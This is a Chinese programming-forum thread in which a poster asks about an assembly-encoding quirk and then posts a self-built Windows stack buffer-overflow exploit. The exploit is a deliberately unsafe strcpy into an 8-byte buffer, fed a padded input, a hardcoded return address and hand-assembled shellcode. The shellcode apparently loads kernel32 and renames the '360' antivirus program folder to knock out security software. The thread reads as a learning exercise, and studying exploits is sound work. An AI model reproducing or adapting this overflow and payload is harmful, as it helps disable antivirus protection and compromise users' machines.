鱼C论坛

 找回密码
 立即注册
查看: 2770|回复: 4

换编码_转_机器码_待解决

[复制链接]
发表于 2019-5-10 16:16:50 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能^_^

您需要 登录 才可以下载或查看,没有账号?立即注册

x
本帖最后由 涛4091 于 2023-2-23 11:05 编辑

批注 2019-05-10 144650.png

地址为什么自动加上了 ff
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

发表于 2019-5-10 17:35:18 | 显示全部楼层
贴代码
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2019-5-10 17:36:32 | 显示全部楼层
本帖最后由 jackz007 于 2019-5-10 17:45 编辑

     既然是地址,那就很可能是重定位项,从文件中读取到的数值和实际加载后的数值不一样很正常。

     楼主这是在切分汇编指令,自己动手写反汇编引擎?很 NB 嘛!
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-5-10 19:59:12 | 显示全部楼层
jackz007 发表于 2019-5-10 17:36
既然是地址,那就很可能是重定位项,从文件中读取到的数值和实际加载后的数值不一样很正常。

      ...

写shellcode
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-5-10 20:02:14 | 显示全部楼层

呐 代码
#include<windows.h>
#include<stdio.h>

char input[]=
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x6b\x8c\x49\x7e"

"\x55"
"\x8B\xEC"
"\x83\xEC\x20"
"\xB8\x6B\x65\x72\x6E"
"\x89\x45\xF0"
"\xB8\x65\x6C\x33\x32"
"\x89\x45\xF4"
"\xB8\x2E\x64\x6C\x6C"
"\x89\x45\xF8"
"\x8D\x45\xF0"
"\x50"
"\xBA\x7B\x1D\x80\x7C"
"\xFF\xD2"
"\x55"
"\x8B\xEC"
"\x83\xEC\x30"
"\xB8\x43\x3A\x5C\x5C"
"\x89\x45\xD0"
"\xB8\x50\x72\x6F\x67"
"\x89\x45\xD4"
"\xB8\x72\x61\x6D\x20"
"\x89\x45\xD8"
"\xB8\x46\x69\x6C\x65"
"\x89\x45\xDC"
"\xB8\x73\x5C\x5C\x33"
"\x89\x45\xE0"
"\xB8\x36\x30\x00\x00"
"\x89\x45\xE4"
"\x8D\x7D\xD0"
"\xB8\x43\x3A\x5C\x5C"
"\x89\x45\xE8"
"\xB8\x50\x72\x6F\x67"
"\x89\x45\xEC"
"\xB8\x72\x61\x6D\x20"
"\x89\x45\xF0"
"\xB8\x46\x69\x6C\x65"
"\x89\x45\xF4"
"\xB8\x73\x5C\x5C\x33"
"\x89\x45\xF8"
"\xB8\x36\x30\x31\x00"
"\x89\x45\xFC"
"\x8D\x75\xE8"
"\x56"
"\x57"
"\xB8\xA7\x5E\x83\x7C"
"\xFF\xD0";


int main()
{
        char buff[8];
        LoadLibrary("user32.dll");
        strcpy(buff,input);
        return 0;
}
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|鱼C工作室 ( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)

GMT+8, 2024-12-26 11:23

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表